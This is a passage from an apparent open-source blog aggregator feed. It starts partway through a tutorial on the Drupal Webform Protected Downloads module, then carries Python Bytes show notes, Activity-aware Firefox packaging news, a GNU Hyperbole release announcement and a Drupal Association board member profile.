We had used the module on an old Drupal 7 site a long time ago, but there hadn't been any work on it for a few years and there was no release compatible with Drupal 10. However, development had started in a branch that had been automatically opened up to new maintainers. This was a great example of how that process can help the community keep modules up-to-date and secure with little fuss. All I had to do was confirm a few details myself, and within a few hours I had access to update the project. Of course, I'm building upon the great work that has been done by the previous maintainers - and in this case, Timotej Lovrecic especially, who had created an initial fork on GitHub that was compatible with Drupal 8.

Now that we have a version to use with Drupal 10; let me introduce you to how to use it! I'll assume you can already download and install the module

Screenshot of the handler settings (click image for full size)

When you configure the settings of a webform, you can set up 'handlers'. Emails sent to users or administrators are probably the most common sort of handler, so the tab to configure these under Webform's 'Settings' page is labelled 'Emails / Handlers'. Add a handler, and choose the 'Webform protected download' type in the popup.

From here you can control what amount of verification you want to apply to the download link (such as whether you want to restrict it to the user that submits the form or not), whether the link should only work once, or expire after some time. The file to protect can be uploaded at the bottom of the form. 

Once you've configured and saved your handler, the next step is to use tokens to set how a user receives their link. These could go in an email - in which case configure an email handler, or a confirmation message/page - which can be set from the 'Confirmation' tab of the Webform's 'Settings' page.

In either case, the token to use takes the format: [webform_submission:protected_download_url:my_handler_id]. (If you only have one protected download, you can skip that last part off so it is just [webform_submission:protected_download_url].) The handler ID should be the 'machine name' from your handler settings, which is also shown in a column in the list of handlers. The token will be replaced with the user's unique download URL, so you may wish to use it directly within a plain-text email, or as a link destination in a confirmation message (which is usually HTML).

Example of using a download token for a link within the confirmation message

With that token in the right place, when your guest completes the webform, they'll now receive the link to download the file they wanted - and you'll have what you wanted in return.

Let me know how you get on. Your feedback is welcome in the comments below or in the Webform Protected Downloads module's issue queue!

Categories: FLOSS Project Planets

The Drop Times: Dries Buytaert's Visit to Japan: Fostering Growth for Drupal Community

Planet Drupal - Mon, 2024-03-11 05:59
Explore the burgeoning impact of Dries Buytaert's visit to Japan, which fosters growth and collaboration within the local Drupal community. Delve into the anticipation surrounding his return and the promising prospects it brings for Drupal enthusiasts in Japan.
Categories: FLOSS Project Planets

Python Bytes: #374 Climbing the Python Web Mountain

Planet Python - Mon, 2024-03-11 04:00
<strong>Topics covered in this episode:</strong><br> <ul> <li><a href="https://www.piglei.com/articles/en-6-ways-to-improve-the-arch-of-you-py-project/"><strong>6 ways to improve the architecture of your Python project (using import-linter)</strong></a></li> <li><a href="https://github.com/piercefreeman/mountaineer">Mountaineer</a></li> <li><a href="https://python-history.blogspot.com/2010/08/why-pythons-integer-division-floors.html"><strong>Why Python's Integer Division Floors</strong></a></li> <li><a href="https://hatchet.run"><strong>Hatchet</strong></a></li> <li><strong>Extras</strong></li> <li><strong>Joke</strong></li> </ul><a href='https://www.youtube.com/watch?v=SaV3sJ8FlZU' style='font-weight: bold;'data-umami-event="Livestream-Past" data-umami-event-episode="374">Watch on YouTube</a><br> <p><strong>About the show</strong></p> <p>Sponsored by ScoutAPM: <a href="https://pythonbytes.fm/scout"><strong>pythonbytes.fm/scout</strong></a></p> <p><strong>Connect with the hosts</strong></p> <ul> <li>Michael: <a href="https://fosstodon.org/@mkennedy"><strong>@mkennedy@fosstodon.org</strong></a></li> <li>Brian: <a href="https://fosstodon.org/@brianokken"><strong>@brianokken@fosstodon.org</strong></a></li> <li>Show: <a href="https://fosstodon.org/@pythonbytes"><strong>@pythonbytes@fosstodon.org</strong></a></li> </ul> <p>Join us on YouTube at <a href="https://pythonbytes.fm/stream/live"><strong>pythonbytes.fm/live</strong></a> to be part of the audience. Usually Tuesdays at 11am PT. Older video versions available there too.</p> <p><strong>Brian #1:</strong> <a href="https://www.piglei.com/articles/en-6-ways-to-improve-the-arch-of-you-py-project/"><strong>6 ways to improve the architecture of your Python project (using import-linter)</strong></a></p> <ul> <li>Piglei</li> <li>Using <a href="https://github.com/seddonym/import-linter">import-linter</a> to <ul> <li>define architectural layers</li> <li>check to make sure imports don’t violate (import from upper layers)</li> <li>can also check for more contracts, such as <ul> <li>forbidden - disallow a specific from/to import </li> <li>independence - list of modules that shouldn’t import from each other</li> </ul></li> </ul></li> <li>Fixing violations <ul> <li>a process introduced to set exceptions for each violation in a config file</li> <li>then fix violations 1 at a time (nice approach)</li> <li>use the whole team if you can</li> </ul></li> <li>Common methods for fixing dependency issues <ul> <li>Merging and splitting modules</li> <li>Dependency Injection, including using protocols to keep type hints without the need to import just for types</li> <li>Use simpler dependency types</li> <li>Delaying function implementations <ul> <li>module global methods set by caller, or adding a simple plugin/callback system</li> </ul></li> <li>Configuration driven <ul> <li>Setting import statements in a config file and using <code>import_string()</code> at runtime</li> </ul></li> <li>Replace function calls with event-driven approaches</li> </ul></li> </ul> <p><strong>Michael #2:</strong> <a href="https://github.com/piercefreeman/mountaineer">Mountaineer</a></p> <ul> <li>Mountaineer is a batteries-included web framework for Python and React.</li> <li>Mountaineer focuses on developer productivity above all else, with production speed a close second. <ul> <li>📝 Typehints up and down the stack: frontend, backend, and database</li> <li>🎙️ Trivially easy client[HTML_REMOVED]server communication, data binding, and function calling</li> <li>🌎 Optimized server rendering for better accessibility and SEO</li> <li>🏹 Static analysis of web pages for strong validation: link validity, data access, etc.</li> <li>🤩 Skip the API or Node.js server just to serve frontend clients</li> </ul></li> </ul> <p><strong>Brian #3:</strong> <a href="https://python-history.blogspot.com/2010/08/why-pythons-integer-division-floors.html"><strong>Why Python's Integer Division Floors</strong></a></p> <ul> <li>Guido van Rossum</li> <li>Integer division always floors (toward negative infinity) instead of truncating. (C truncates)</li> <li>5//2 → 2</li> <li>-5//2 → -3</li> <li>5//-2 → -3</li> <li>Reason, <ul> <li>For nice mathematical relationships with // and % (modulo).</li> <li>a//b = quotient (q), a%b = remainder (r)</li> <li>such that b*q + r = a, and 0 &lt;= r &lt; b <ul> <li>This works for both positive and negative a values</li> <li>For negative b, the second rule has to change to 0 &gt;= r &gt; b </li> </ul></li> </ul></li> <li>If you truncate (like C does), you have to use abs(r) for the first rule to work.</li> <li>Theory of why C doesn’t do it this way: Probably a hardware limitation at the time when C was designed, due to “sign + magnitude” integers instead of modern two’s compliment integers.</li> </ul> <p><strong>Michael #4:</strong> <a href="https://hatchet.run"><strong>Hatchet</strong></a></p> <ul> <li>Hatchet is a distributed, fault-tolerant task queue which replaces traditional message brokers and pub/sub systems. </li> <li>It’s built to solve problems like concurrency, fairness, and durability</li> <li>Concurrency, Fairness, and Rate limiting: Enable FIFO, LIFO, Round Robin, and Priority Queues with built-in strategies to avoid common pitfalls.</li> <li>Architected for Resiliency: Customizable retry policies and built-in error handling to recover from transient failures.</li> </ul> <p><strong>Extras</strong> </p> <p>Brian:</p> <ul> <li><a href="https://pythontest.com/216"><strong>Charlie Marsh on uv in PythonTest episode 216</strong></a></li> </ul> <p>Michael:</p> <ul> <li><a href="https://training.talkpython.fm/courses/build-an-audio-ai-app-with-python-and-assemblyai"><strong>Build An Audio AI App Course</strong></a> [free!]</li> <li><a href="https://training.talkpython.fm/courses/python-type-hint-course-with-hands-on-examples"><strong>Rock Solid Python with Python Typing Course</strong></a></li> <li><a href="https://mstdn.social/@RayScript/111919177551660638"><strong>Coolio</strong></a></li> </ul> <p><strong>Joke:</strong> <a href="https://workchronicles.com/not-if-but-when/"><strong>Breaking Prod</strong></a></p>
Categories: FLOSS Project Planets

Activity-aware Firefox 0.4.2 & packages for Debian and Arch

Planet KDE - Sun, 2024-03-10 19:00

If you have not been following this blog series, I made a wrapper for Firefox to be able to run different tabs (and more) in different KDE Plasma Activities.

Often a hurdle to using a piece of software is that it is not packaged for Linux distros.

Kudos to Aurélien Couderc (coucouf), who packaged already 0.4.1 for Debian and provided the patch to make it easier to package to different distros.

With 0.4.2 version of Activity-aware Firefox we applied that patch. Other then that, the functionality remains the same as in 0.4.1.

Then I also wrote an AUR package, so Arch, EndeavourOS etc. should be covered now too.

As a consequence, Repology now lists 12 distro packages for Activity-aware Firefox – that is a great start!

But while large, Debian- and Arch-based distros are just a subset of all available FOSS operating systems that KDE Plasma and Firefox run on. If someone were to put it on Open Build Service to cover also RPM-based and other distros, that would be a great boon!

Contributions welcome, as I am reaching the limit of my skills here.

hook out → server migration successful – more on that some other day

Categories: FLOSS Project Planets

hyperbole @ Savannah: GNU Hyperbole Major Release 9 (V9.0.1) Rhapsody

GNU Planet! - Sun, 2024-03-10 18:22
Overview


GNU Hyperbole 9.0.1, the Rhapsody release, is now available on GNU ELPA. 
And oh what a release it is: extensive new features, new video
demos, org and org roam integration, Markdown and Org file support in
HyRolo, recursive directory and wildcard file scanning in HyRolo, and
much more.

What's new in this release is extensively described here:

  www.gnu.org/s/hyperbole/HY-NEWS.html

  Everything back until release 8.0.0 is new since the last major release
  announcement (almost a year and a half ago), so updates are extensive.

Hyperbole is like Markdown for hypertext.  Hyperbole automatically
recognizes dozens of common patterns in any buffer regardless of mode
and transparently turns them into hyperbuttons you can instantly
activate with a single key.  Email addresses, URLs, grep -n outputs,
programming backtraces, sequences of Emacs keys, programming
identifiers, Texinfo and Info cross-references, Org links, Markdown
links and on and on.  All you do is load Hyperbole and then your text
comes to life with no extra effort or complex formatting.

But Hyperbole is also a personal information manager with built-in
capabilities of contact management/hierarchical record lookup,
legal-numbered outlines with hyperlinkable views and a unique window
and frame manager.  It is even Org-compatible so you can use all of
Org's capabilities together with Hyperbole.

Hyperbole stays out of your way but is always a key press away when
you need it.  Like Emacs, Org, Counsel and Helm, Hyperbole has many
different uses, all based around the theme of reducing cognitive load
and improving your everyday information management.  It reduces
cognitive load by using a single Action Key, {M-RET}, across many
different contexts to perform the best default action in each.

Hyperbole has always been one of the best documented Emacs packages.
With Version 9 comes excellent test coverage: over 400 automated tests
are run with every update against every major version of Emacs since
version 27, to ensure quality.  We hope you'll give it a try.

Videos


If you prefer video introductions, visit the videos linked to below;
otherwise, skip to the next section.

GNU Hyperbole Videos with Web Links


Installing and Using Hyperbole


To install within GNU Emacs, use:

   {M-x package-install RET hyperbole RET}

   Hyperbole installs in less than a minute and can be uninstalled even
   faster if ever need be.  Give it a try.

Then to invoke its minibuffer menu, use:

   {C-h h} or {M-x hyperbole RET}

The best way to get a feel for many of its capabilities is to invoke the
all new, interactive FAST-DEMO and explore sections of interest:

   {C-h h d d}

To permanently activate Hyperbole in your Emacs initialization file, add
the line:

   (hyperbole-mode 1)

Hyperbole is a minor mode that may be disabled at any time with:

   {C-u 0 hyperbole-mode RET}

The Hyperbole home page with screenshots is here:

   www.gnu.org/s/hyperbole

For use cases, see:

   www.gnu.org/s/hyperbole/HY-WHY.html

For what users think about Hyperbole, see:

   www.gnu.org/s/hyperbole/hyperbole.html#user-quotes

Enjoy,

The Hyperbole Team

Categories: FLOSS Project Planets

Drupal Association blog: Meet Imre, empowering Drupal's growth as a board member of the Drupal Association

Planet Drupal - Sun, 2024-03-10 09:30

We're delighted to introduce Imre Gmelig Meijling, one of the newest members elected in October of the Drupal Association Board. Imre, CEO at React Online Digital Agency in The Netherlands, brings a wealth of digital experience from roles at organizations like the United Nations World Food Programme, Disney, and Port of Rotterdam.

Imre is not only a member of the Drupal Association Board of Directors but also serves as an executive member on the DrupalCon Europe Advisory Committee. Previously, he chaired the Dutch Drupal Association, expanding marketing efforts and establishing a successful Drupal Partner Program. Imre played a key role in launching drupal.nl, a community website used by several countries. He co-created the Splash Awards and led Drupaljam, a Dutch Drupal event with almost 500 attendees. In 2023, Imre joined the Drupal Business Survey.

As a recent board member, Imre shares insights on this exciting journey:

What are you most excited about when it comes to joining the Drupal Association board?
I am very excited about joining the Drupal Association Board and contributing with insights and perspectives from the digital business market in Europe. Drupal has a strong market position with many opportunities for the coming years. I look forward to supporting the marketing team in their expanding efforts. I am particularly proud and excited to be part of an inclusive global community. Being part of an inclusive global community and supporting the Open Web Manifesto aligns closely with my personal values.

What do you hope to accomplish during your time on the board?
I aim to help expand Drupal's marketing outreach aiming for more wonderful brands and organizations adopting Drupal and attracting new talent to get involved with Drupal. I am also looking forward to establishing and sustaining relationships between Europe and other regions with the Drupal Association and finding ways to work even more closely together.

What specific skill or perspective do you contribute to the board?
Being part of an inclusive global community and supporting the Open Web Manifesto aligns closely with my personal values. Working with Drupal at various digital agencies in Europe, I support the growth of Drupal from a business-perspective, but having a technical background, I know the strength of the Drupal community has and can be for brands. Having been in both worlds for a long time, I will help and make sure we bring them together.

I was Chair of the Board for the Dutch Drupal Association, in which time a successful Dutch Partner Program was launched. Also, marketing and advertising on mainstream media was taking off during that time. I was also involved in the design and setup of the Dutch Drupal website, which is now open source. I co-founded the Splash Awards and I am Executive Member of the DrupalCon Europe Community Advisory Committee. I will share all of my experiences where I can. 

How has Drupal impacted your life or career?
It's part of my life, both professional as well as personal, for over 16 years.

Tell us something that the Drupal community might not know about you.
I own my own digital agency in The Netherlands, React Online. I began my career as a UX designer and front end developer for Lotus Notes applications, called 'groupware' at the time, a long gone predecessor to the social collaboration platforms that we now know well. Interestingly, my birthday is on January 15, just like Drupal!

Share a favorite quote or piece of advice that has inspired you.
A true leader is not one with the most followers, but one who makes the most leaders out of others. A true master is not the one with the most students, but one who makes masters out of others.

We can't wait to experience the incredible contributions Imre will make during his time on the Drupal Association Board. Thank you, Imre, for dedicating yourself to serving the Drupal community through your board work! Connect with Imre on LinkedIn.

The Drupal Association Board of Directors comprises 12 members, with nine nominated for staggered 3-year terms, two elected by the Drupal Association members, and one reserved for the Drupal Project Founder, Dries Buyteart. The Board meets twice in person and four times virtually annually, overseeing policy establishment, executive director management, budget approval, financial reports, and participation in fundraising efforts.

Categories: FLOSS Project Planets

Pages